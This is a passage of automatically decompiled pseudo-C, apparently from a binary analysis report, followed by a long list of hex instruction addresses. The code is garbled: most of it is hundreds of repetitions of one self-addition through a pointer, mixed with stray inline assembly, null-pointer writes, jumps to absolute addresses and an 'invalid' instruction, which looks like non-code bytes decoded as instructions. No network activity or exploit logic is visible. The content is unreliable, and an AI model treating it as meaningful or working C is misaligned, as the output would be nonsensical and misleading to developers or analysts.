					 *[fs:eax] =  *[fs:eax] + _t147;
					_pop(es);
					asm("rol byte [ebx], 0x47");
					_t152 = _t152 +  *_t147;
					_t134 = _t100 + 0x17d +  *((intOrPtr*)(_t100 + 0x17d));
					 *_t144 =  *_t144 + 1;
					 *_t134 =  *_t134 - _t134;
					 *_t134 =  *_t134 + _t134;
					_t135 = _t134 + 7;
					 *((intOrPtr*)(_t156 + 0x61)) =  *((intOrPtr*)(_t156 + 0x61)) + _t147;
					_t159 =  *(_t156 + _t153 + 0x61) * 0x507006c;
					asm("loopne 0x3");
					 *0x13b04bf =  *0x13b04bf - _t135;
					_t108 = _t135 | 0x00000008;
					_t36 = _t152 + 0x61;
					 *_t36 =  *((intOrPtr*)(_t152 + 0x61)) + _t108;
					_t178 =  *_t36;
					if(_t178 < 0) {
						L33:
						 *_t108 =  *_t108 + _t108;
						 *((intOrPtr*)(_t155 + _t147 * 2)) =  *((intOrPtr*)(_t155 + _t147 * 2)) + _t152;
						_t109 = _t108 + 1;
						 *_t153 =  *_t153 + _t109;
						 *_t109 =  *_t109 + _t109;
						_t157 = _t156 - 1;
						_t111 = _t109 + _t147 + 1;
						 *_t153 =  *_t153 + _t111;
						 *_t111 =  *_t111 + _t111;
						 *((intOrPtr*)(_t111 + 0x4d)) =  *((intOrPtr*)(_t111 + 0x4d)) + _t152;
						_t112 = _t111 + 1;
						 *_t153 =  *_t153 + _t112;
						goto L34;
					} else {
						if(_t178 != 0) {
							L32:
							 *_t153 =  *_t153 + _t107;
							 *_t107 =  *_t107 + _t107;
							 *((intOrPtr*)(_t107 + 0x4e)) =  *((intOrPtr*)(_t107 + 0x4e)) + _t152;
							_t108 = _t107 + 1;
							 *_t153 =  *_t153 + _t108;
							goto L33;
						} else {
							_push(0x1130065);
							_t144 = _t144 + _t144;
							_t157 = _t156 +  *_t152;
							 *_t108 =  *_t108 + _t108;
							 *0x6e490005 =  *0x6e490005 + _t108;
							if( *0x6e490005 == 0) {
								L34:
								 *_t112 =  *_t112 + _t112;
								 *_t112 =  *_t112 + _t112;
								_t158 = _t157 - 1;
								_t113 = _t112 + 1;
								 *_t153 =  *_t153 + _t113;
								 *_t113 =  *_t113 + _t113;
								 *((intOrPtr*)(_t159 + 0x42560040 + _t147 * 2)) =  *((intOrPtr*)(_t159 + 0x42560040 + _t147 * 2)) + _t113;
								goto L35;
							} else {
								asm("outsd");
								 *_t153 =  *_t153 + _t108;
								_t153 = 0xc013b04;
								_t113 = _t108 + 0x034801e0 |  *(_t108 + 0x34801e0);
								_t180 = _t113;
								asm("insb");
								if(_t180 == 0) {
									asm("insd");
									if(_t180 >= 0) {
										asm("gs outsb");
										 *_t144 =  *_t144 + _t152;
										 *_t113 =  *_t113 + _t113;
										 *_t152 =  *_t152 + 1;
										goto L31;
									}
									L35:
								}
							}
						}
					}
				}
				 *((intOrPtr*)(_t155 + 0x42)) =  *((intOrPtr*)(_t155 + 0x42)) + _t152;
				_t115 = _t113 + 0x00000001 ^ 0x2a263621;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t155 =  *_t155 + _t144;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				_t116 = _t115 |  *_t115;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				asm("movsb");
				asm("sbb al, [eax]");
				_t148 = _t147 >> 1;
				 *_t116 =  *_t116 ^ _t116;
				_t145 = _t144 + _t144;
				asm("invalid");
				 *_t116 =  *_t116 | _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 | _t116;
				 *_t116 =  *_t116 + _t116;
				goto 0xe0401a55;
				asm("sbb al, 0x40");
				 *((intOrPtr*)(_t116 - 0xbffbfe7)) =  *((intOrPtr*)(_t116 - 0xbffbfe7)) + _t148;
				_pop(ss);
				_t117 = _t116 + 1;
				 *_t117 =  *_t117 + _t145;
				 *_t117 =  *_t117 + _t117;
				 *_t117 = _t117;
				 *_t117 =  *_t117 + _t117;
				_t118 = _t148;
				_t149 = _t117;
				 *_t118 =  *_t118 + _t118;
				 *_t152 =  *_t152 + _t152;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				_t62 = _t158 + 0x72;
				 *_t62 =  *((intOrPtr*)(_t158 + 0x72)) + _t152;
				_t186 =  *_t62;
				if(_t186 != 0) {
					L45:
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
				} else {
					if(_t186 != 0) {
						L43:
						 *_t118 =  *_t118 + _t118;
						goto L44;
					} else {
						if(_t186 >= 0) {
							L44:
							 *_t118 =  *_t118 + _t118;
							goto L45;
						} else {
							asm("outsb");
							if(_t186 >= 0) {
								if(_t186 < 0) {
									 *((intOrPtr*)(_t118 + 0x72)) =  *((intOrPtr*)(_t118 + 0x72)) + _t152;
									asm("outsd");
									_push(0x65);
									asm("arpl [ecx+esi], si");
									 *((intOrPtr*)(_t118 + 0x72)) =  *((intOrPtr*)(_t118 + 0x72)) + _t152;
									asm("outsd");
									_push(0x65);
									asm("arpl [ecx+esi], si");
									_t129 = _t118 + _t152;
									 *_t129 =  *_t129 + _t129;
									 *_t129 =  *_t129 + _t145;
									_t131 = _t129 - 1 + 1;
									 *_t131 =  *_t131 + _t131;
									 *_t131 =  *_t131 + _t131;
									_t118 = _t131 + _t152;
									_t149 = _t149 + 2;
									 *((intOrPtr*)(_t118 + 0x400423a)) =  *((intOrPtr*)(_t118 + 0x400423a)) + _t152;
									_t155 = _t155 + 1;
									 *_t118 =  *_t118 + _t118;
									 *(_t118 + 0x42) =  *(_t118 + 0x42) | _t152;
									 *_t155 =  *_t155 + _t152;
									asm("adc eax, 0x50000040");
								}
								 *(_t118 + 0x42) =  *(_t118 + 0x42) + _t152;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								 *_t118 =  *_t118 + _t118;
								goto L43;
							}
						}
					}
				}
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				do {
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t118;
					 *((intOrPtr*)(_t118 + 0xc004019)) =  *((intOrPtr*)(_t118 + 0xc004019)) + _t149;
					 *_t118 =  *_t118 + _t118;
					 *_t118 =  *_t118 + _t152;
					 *_t118 =  *_t118 + _t118;
					asm("repe adc eax, 0x104e181");
					 *(_t149 - 0x4a) = _t118;
					_push(es);
					 *(_t158 - 0x1c) =  *(_t158 - 0x1c) ^ _t158;
					_t149 = _t149 + 1;
				} while (_t149 < 0);
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				_t119 = _t118 +  *_t118;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *((intOrPtr*)(_t119 + 1)) =  *((intOrPtr*)(_t119 + 1)) + _t152;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				_t120 = _t119 + 1;
				 *((intOrPtr*)(_t120 + _t120)) =  *((intOrPtr*)(_t120 + _t120)) + _t149;
				 *_t120 =  *_t120 + _t152;
				_push(_t120);
				 *_t120 =  *_t120 + _t120;
				 *((intOrPtr*)(_t120 + 0x29fdefb4)) =  *((intOrPtr*)(_t120 + 0x29fdefb4)) + _t152;
				asm("bound ecx, [ecx-0x57]");
				asm("retf");
				es = _t155;
				asm("fcmovnbe st0, st4");
				_t122 = 0 +  *((intOrPtr*)(0));
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *_t149 =  *_t149 + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t122;
				_t123 = 0 +  *((intOrPtr*)(0));
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *((intOrPtr*)(_t158 - 0x39)) =  *((intOrPtr*)(_t158 - 0x39)) + _t152;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t123;
				 *(_t155 + 0x40) =  *(_t155 + 0x40) << 0;
				asm("pushfd");
				 *_t123 =  *_t123 + _t123;
				 *_t123 =  *_t123 + _t152;
				 *_t123 =  *_t123 + _t123;
				asm("lds esi, [ebx-0x33]");
				asm("out 0x1f, al");
				asm("popad");
				asm("aam 0xff");
				_t125 = (_t123 ^ 0x8449f36c) +  *[es:eax];
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t152 =  *_t152 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				_t126 = _t125 +  *_t125;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *((intOrPtr*)(_t145 + 1)) =  *((intOrPtr*)(_t145 + 1)) + _t152;
				 *_t126 =  *_t126 + _t126;
				 *((intOrPtr*)(_t126 + 0x6c)) =  *((intOrPtr*)(_t126 + 0x6c)) + _t152;
				_t128 = _t126 + 1 + _t149;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t152;
				 *_t128 =  *_t128 + _t128;
				return _t128;
			}

0x004017e8
0x004017e8
0x004017e8
0x004017e8
0x004017e8
0x004017e8
0x004017ed
0x004017f2
0x004017f4
0x004017f6
0x004017f8
0x004017fa
0x004017fc
0x004017fd
0x004017ff
0x00401801
0x00401803
0x00401804
0x00401804
0x0040180b
0x0040180c
0x00401812
0x00401818
0x0040181a
0x0040181c
0x0040181e
0x00401820
0x00401822
0x00401824
0x00401825
0x00000000
0x00000000
0x00401827
0x00401829
0x0040182d
0x00401830
0x00401832
0x00401833
0x00401835
0x00401837
0x00401838
0x0040183a
0x00401841
0x00401843
0x00401846
0x00401847
0x0040184a
0x0040184b
0x00000000
0x0040184d
0x0040184d
0x00401850
0x00401851
0x00401852
0x00401853
0x00401855
0x00401859
0x0040185f
0x00401866
0x00401868
0x00401869
0x0040186c
0x0040186c
0x0040186d
0x0040186f
0x00401871
0x00401873
0x00401875
0x00401877
0x00401879
0x0040187b
0x0040187d
0x0040187f
0x00401881
0x00401883
0x00401885
0x00401887
0x00401889
0x0040188b
0x0040188d
0x0040188f
0x00401891
0x00401892
0x00401894
0x00401894
0x00000000
0x0040184b
0x00401896
0x00401898
0x0040189a
0x0040189a
0x0040189c
0x00401902
0x00401904
0x00401906
0x00401908
0x0040190a
0x0040190c
0x00000000
0x0040189e
0x0040189e
0x00401901
0x00401901
0x00000000
0x004018a0
0x004018a0
0x004018a1
0x0040190d
0x0040190d
0x0040190e
0x0040190f
0x00401910
0x00401911
0x00401912
0x00401917
0x00401917
0x00000000
0x004018a4
0x004018a4
0x004018a5
0x004018a9
0x004018a9
0x004018ae
0x004018af
0x0040191e
0x0040191e
0x00401920
0x00401922
0x00000000
0x004018b1
0x004018b1
0x00401918
0x00401918
0x0040191b
0x0040191c
0x00000000
0x004018b3
0x004018b3
0x004018b4
0x00401924
0x00401924
0x00401925
0x00401927
0x00000000
0x004018b6
0x004018b6
0x004018bd
0x004018c2
0x004018c4
0x004018c4
0x004018c4
0x004018c8
0x004018c9
0x00401930
0x00401930
0x00401934
0x00401937
0x00401939
0x0040193b
0x004018cb
0x004018cb
0x004018cc
0x004018ce
0x004018d5
0x004018d7
0x004018d9
0x004018db
0x004018dd
0x004018df
0x004018e1
0x004018e3
0x004018e7
0x004018e9
0x004018eb
0x004018ed
0x004018ef
0x004018f0
0x004018f0
0x004018f4
0x004018f7
0x004018f9
0x004018fa
0x004018fc
0x004018fe
0x00401900
0x00000000
0x00401900
0x00401928
0x00401928
0x0040192a
0x0040192d
0x0040192e
0x00000000
0x0040192e
0x004018cc
0x004018c9
0x004018b4
0x004018b1
0x004018af
0x004018a1
0x0040189e
0x0040193c
0x0040193d
0x0040193e
0x0040193f
0x004019a6
0x004019a6
0x004019a9
0x004019ab
0x004019ad
0x004019b0
0x004019b1
0x004019b5
0x004019b6
0x004019b7
0x004019b9
0x004019bb
0x004019c1
0x004019c3
0x004019c5
0x004019c6
0x004019c7
0x004019c9
0x004019cd
0x004019ce
0x004019cf
0x004019d1
0x004019d3
0x00000000
0x00401941
0x00401941
0x00401946
0x00401947
0x0040194c
0x0040194e
0x00401950
0x00401952
0x00401954
0x00401956
0x00401958
0x0040195b
0x00401963
0x00401965
0x0040196b
0x0040196d
0x0040196d
0x0040196d
0x00401970
0x004019e1
0x004019e1
0x004019e3
0x004019e6
0x004019e7
0x004019e9
0x004019ed
0x004019ee
0x004019ef
0x004019f1
0x004019f3
0x004019f6
0x004019f7
0x00000000
0x00401972
0x00401972
0x004019d7
0x004019d7
0x004019d9
0x004019db
0x004019de
0x004019df
0x00000000
0x00401974
0x00401974
0x00401979
0x0040197b
0x0040197d
0x0040197f
0x00401985
0x004019f9
0x004019f9
0x004019fb
0x004019fd
0x004019fe
0x004019ff
0x00401a01
0x00401a03
0x00000000
0x00401987
0x00401987
0x00401988
0x0040198f
0x00401994
0x00401994
0x00401996
0x00401997
0x00401999
0x0040199a
0x0040199d
0x004019a1
0x004019a3
0x004019a5
0x00000000
0x004019a5
0x00401a05
0x00401a05
0x00401997
0x00401985
0x00401972
0x00401970
0x00401a07
0x00401a0a
0x00401a0f
0x00401a11
0x00401a13
0x00401a15
0x00401a17
0x00401a19
0x00401a1b
0x00401a1e
0x00401a20
0x00401a22
0x00401a24
0x00401a26
0x00401a28
0x00401a2a
0x00401a2c
0x00401a2e
0x00401a30
0x00401a32
0x00401a34
0x00401a36
0x00401a38
0x00401a39
0x00401a3c
0x00401a3e
0x00401a40
0x00401a42
0x00401a44
0x00401a46
0x00401a48
0x00401a4a
0x00401a4c
0x00401a4e
0x00401a50
0x00401a55
0x00401a57
0x00401a5d
0x00401a5e
0x00401a5f
0x00401a62
0x00401a64
0x00401a66
0x00401a68
0x00401a68
0x00401a69
0x00401a6b
0x00401a71
0x00401a73
0x00401a75
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a7f
0x00401a7f
0x00401a82
0x00401aeb
0x00401aeb
0x00401aed
0x00401aef
0x00401af1
0x00401af3
0x00401af5
0x00401af7
0x00401af9
0x00401a84
0x00401a84
0x00401ae7
0x00401ae7
0x00000000
0x00401a86
0x00401a86
0x00401ae9
0x00401ae9
0x00000000
0x00401a88
0x00401a88
0x00401a89
0x00401a8c
0x00401a8f
0x00401a92
0x00401a93
0x00401a95
0x00401a99
0x00401a9c
0x00401a9d
0x00401a9f
0x00401aa3
0x00401aa5
0x00401aa7
0x00401aaa
0x00401aab
0x00401aad
0x00401aaf
0x00401ab2
0x00401ab3
0x00401ab9
0x00401aba
0x00401abc
0x00401abf
0x00401ac1
0x00401ac1
0x00401ac4
0x00401ac7
0x00401ac9
0x00401acb
0x00401acd
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401add
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae5
0x00000000
0x00401ae5
0x00401a89
0x00401a86
0x00401a84
0x00401afa
0x00401afc
0x00401afe
0x00401b00
0x00401b02
0x00401b04
0x00401b06
0x00401b08
0x00401b0a
0x00401b0c
0x00401b0e
0x00401b10
0x00401b12
0x00401b14
0x00401b16
0x00401b18
0x00401b1a
0x00401b1c
0x00401b1e
0x00401b20
0x00401b22
0x00401b24
0x00401b26
0x00401b28
0x00401b2a
0x00401b2c
0x00401b2e
0x00401b30
0x00401b32
0x00401b34
0x00401b36
0x00401b38
0x00401b3a
0x00401b3c
0x00401b3e
0x00401b40
0x00401b42
0x00401b44
0x00401b46
0x00401b48
0x00401b4a
0x00401b4c
0x00401b4e
0x00401b50
0x00401b52
0x00401b54
0x00401b56
0x00401b58
0x00401b5a
0x00401b5c
0x00401b5e
0x00401b60
0x00401b62
0x00401b64
0x00401b66
0x00401b68
0x00401b6a
0x00401b6c
0x00401b6e
0x00401b70
0x00401b72
0x00401b74
0x00401b76
0x00401b78
0x00401b7a
0x00401b7c
0x00401b7e
0x00401b80
0x00401b82
0x00401b84
0x00401b86
0x00401b88
0x00401b8a
0x00401b8c
0x00401b8e
0x00401b90
0x00401b92
0x00401b94
0x00401b96
0x00401b98
0x00401b9a
0x00401b9c
0x00401b9e
0x00401ba0
0x00401ba2
0x00401ba4
0x00401ba6
0x00401ba8
0x00401baa
0x00401bac
0x00401bae
0x00401bb0
0x00401bb2
0x00401bb4
0x00401bb6
0x00401bb8
0x00401bba
0x00401bbc
0x00401bbe
0x00401bc0
0x00401bc2
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bca
0x00401bcc
0x00401bce
0x00401bd0
0x00401bd2
0x00401bd4
0x00401bd6
0x00401bd8
0x00401bda
0x00401bdc
0x00401bde
0x00401be0
0x00401be2
0x00401be4
0x00401be6
0x00401be8
0x00401bea
0x00401bec
0x00401bee
0x00401bf0
0x00401bf2
